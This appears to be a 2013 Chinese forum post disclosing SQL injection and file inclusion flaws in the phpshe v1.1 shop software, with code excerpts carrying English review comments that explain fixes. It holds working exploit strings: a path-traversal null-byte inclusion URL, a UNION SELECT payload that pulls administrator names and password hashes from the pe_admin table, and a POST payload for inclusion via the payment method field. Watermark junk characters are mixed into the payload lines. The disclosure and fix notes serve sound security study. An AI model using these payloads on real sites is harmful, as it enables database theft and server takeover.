
标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell

作者: admin    时间: 2013-4-19 19:01
标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell
/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By: Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0×00 整体大概参数传输


//common.php
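// common.php (excerpt, restored from a watermark-mangled paste): request data is
// copied into local variables. extract() with EXTR_PREFIX_ALL creates $_g_<key> for
// every GET key, $_p_<key> for POST, $_s_<key> for SESSION and $_c_<key> for COOKIE.
// The prefix keeps a request from overwriting unprefixed variables, but every
// $_g_*/$_p_*/$_c_* value is still attacker-controlled input: pe_trim() is presumably
// a recursive trim and pe_stripslashes() presumably reverses magic_quotes escaping
// (confirm both in their definitions), so nothing here escapes for SQL, HTML or file
// paths. Each consumer has to validate the variables it uses.
if (get_magic_quotes_gpc()) {
    // magic_quotes_gpc branch: undo the automatic backslash escaping before trimming
    !empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
    !empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
}
else {
    !empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
    !empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
}
session_start();
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
// Cookies go through pe_stripslashes() in both branches (unlike GET/POST) and become $_c_*.
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');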

0×01 包含漏洞


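// index.php (home page file; excerpt restored from a mangled paste — "<!--?php" and
// "$db--->" were HTML-escaping artifacts of "<?php" and "$db->").
<?php
include('common.php');
// Page-wide caches read by the templates.
$cache_category = cache::get('category');
$cache_category_arr = cache::get('category_arr');
$cache_class = cache::get('class');
$cache_ad = cache::get('ad');
$cache_link = cache::get('link');
$cache_page = cache::get('page');
$web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array();
// Cart size: from the database for a logged-in user, otherwise from the cart cookie.
// NOTE(review): $_c_cart_list is the raw `cart_list` cookie (see the extract() calls in
// common.php), so unserialize() runs on attacker-controlled data. Whether that is
// exploitable depends on the classes loaded at this point (not assessed here); storing
// the cookie as JSON and reading it with json_decode() removes the question entirely.
$cart_num = pe_login('user') ? $db->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
// Dispatch: $module and $mod are set by the routing code in common.php, where $mod is
// taken straight from POST/GET without validation. The include path is therefore
// request-controlled; the only framing is the fixed "module/<module>/" prefix and the
// ".php" suffix, and "../" is not rejected. Null-byte truncation of the suffix, which
// the post's example relies on, was removed in PHP 5.3.4, but the correct fix is
// independent of the PHP version: check $mod against an allow-list of module names
// (or at least basename() it and verify the file exists under the module directory).
include("{$pe['path_root']}module/{$module}/{$mod}.php");  // $mod is request-controlled: the post's "limited-value" file inclusion
pe_result();
?>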
//common.php 文件 第15行开始
//url路由配置
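// common.php, URL routing (excerpt restored from a mangled paste): defaults first,
// then POST overrides GET overrides the default. None of the values is validated.
// $mod is interpolated into an include() path in index.php and presumably, with $act,
// selects the `case` branches of the module files (the switch itself is not shown);
// $id reaches the modules as-is (product.php casts it with intval()).
// The fix belongs here, once: compare $mod and $act against an allow-list of known
// module/action names and reject anything else, so no downstream include() has to
// trust them. Note also that the truthiness tests treat a value of "0" as absent.
$module = $mod = $act = 'index';
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
// $id has no default above, so it stays undefined when neither parameter is sent.
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);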
4 x, J# \: H3 p4 A) ~  Z: w0 F* z//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00



0×02 搜索注入

<code id="code2">

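// product.php, product listing (excerpt restored from a mangled paste; the enclosing
// switch is not part of the excerpt).
case 'list':
    // $id comes from the routing code in common.php; intval() makes it safe for the SQL below.
    $category_id = intval($id);
    $info = $db->pe_select('category', array('category_id'=>$category_id));
    // Search filter, built as a raw SQL fragment that pe_selectall() appends to the query.
    $sqlwhere = " and `product_state` = 1";
    pe_lead('hook/category.hook.php');
    if ($category_id) {
        // Derived from the intval()'d id, so not injectable by the request (assuming
        // category_cidarr() returns database ids). NOTE(review): the pasted line read
        // `where .=`; restored to `$sqlwhere .=`, which the surrounding lines make clear.
        $sqlwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
    }
    // SQL injection (the post's finding): $_g_keyword is the raw GET `keyword` parameter
    // (extract() in common.php) interpolated into the LIKE pattern with no escaping.
    // Fix: bind it as a query parameter, or at minimum apply the driver's string
    // escaping, and escape the LIKE wildcards % and _ as well.
    $_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'";
    if ($_g_orderby) {
        // Same pattern, not mentioned in the post: both halves of the raw `orderby`
        // parameter land in the ORDER BY clause unescaped. Column names and sort
        // direction cannot be bound as parameters, so validate them against an
        // allow-list of known product columns and 'asc'/'desc' before use. Note that
        // $orderby[1] is undefined when the parameter contains no underscore.
        $orderby = explode('_', $_g_orderby);
        $sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
    }
    else {
        $sqlwhere .= " order by `product_id` desc";
    }
    // $_g_page is also raw GET input; how pe_selectall()/sql_selectall() handle the limit array is not shown here.
    $info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
    // best-seller ranking
    $product_hotlist = product_hotlist();
    // breadcrumb path of the current category
    $nowpath = category_path($category_id);
    $seo = pe_seo($info['category_name']);
    include(pe_tpl('product_list.html'));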
//跟进selectall函数库
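/**
 * Selects all rows of `<dbpre><table>` matching $where (excerpt from the DB class,
 * restored from a mangled paste).
 *
 * The query is assembled by string interpolation: $table and $field are inserted
 * verbatim and $where goes through $this->_dowhere(), which is not shown here. The
 * caller in product.php hands it a pre-built " and ..." string, so _dowhere()
 * evidently passes string conditions through (confirm in its definition) — which is
 * how the unescaped keyword/orderby values reach the database unchanged. Escaping is
 * left to every caller; a prepared-statement API would move that responsibility here.
 *
 * @param string       $table       table name without the dbpre prefix
 * @param string|array $where       raw SQL fragment, or a key=>value map as other callers pass
 * @param string       $field       column list, default '*'
 * @param array        $limit_page  pagination spec forwarded to sql_selectall()
 *                                  (per-page count and page number, judging by the caller)
 */
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
    // build the where clause
    $sqlwhere = $this->_dowhere($where);
    return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
}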
//exp
0 P1 I. T- s; ?# E( `4 Dproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='14 F" f7 m# J( d8 x, H

</code>

0×03 包含漏洞2

<code id="code3">

//order.php

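case 'pay':
    // order.php, payment step (excerpt restored from a watermark-mangled paste; the
    // enclosing switch is not part of the excerpt).
    // $_g_id is the raw GET `id`; pe_dbhold() is assumed to escape it for SQL (not shown here).
    $order_id = pe_dbhold($_g_id);
    // Configured payment methods, keyed by payway name; each config blob is stored serialized.
    $cache_payway = cache::get('payway');
    foreach($cache_payway as $k => $v) {
        $cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);
        if ($k == 'bank') {
            // flatten line breaks so the bank text can be embedded in the template
            $cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);
        }
    }
    $order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));
    !$order['order_id'] && pe_error('订单号错误...');
    if (isset($_p_pesubmit)) {
        // Mass assignment: $_p_info is the whole POST `info[]` array (extract() in
        // common.php), so the client decides which columns of the order row are written.
        // Build the update from the expected key only, after validating its value, e.g.
        // array('order_payway' => $payway) with $payway checked as described below.
        if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {
            $info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));
            foreach ($info_list as $v) {
                $order['order_name'] .= "{$v['product_name']};";
            }
            echo '正在为您连接支付网站,请稍后...';
            // File inclusion (the post's finding): info[order_payway] is request-controlled
            // and only framed by a fixed prefix and the "/order_pay.php" suffix. The valid
            // values are the configured payway names — presumably the keys of $cache_payway
            // loaded above — so checking `isset($cache_payway[$_p_info['order_payway']])`
            // before the update (pe_error() otherwise) closes this and keeps the persisted
            // payway value sane at the same time.
            include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");
        } // original note: once the above is in place, the "limited-value" inclusion is reachable
        else {
            pe_error('支付错误...');
        }
    }
    $seo = pe_seo('选择支付方式');
    include(pe_tpl('order_pay.html'));
    break;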

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>



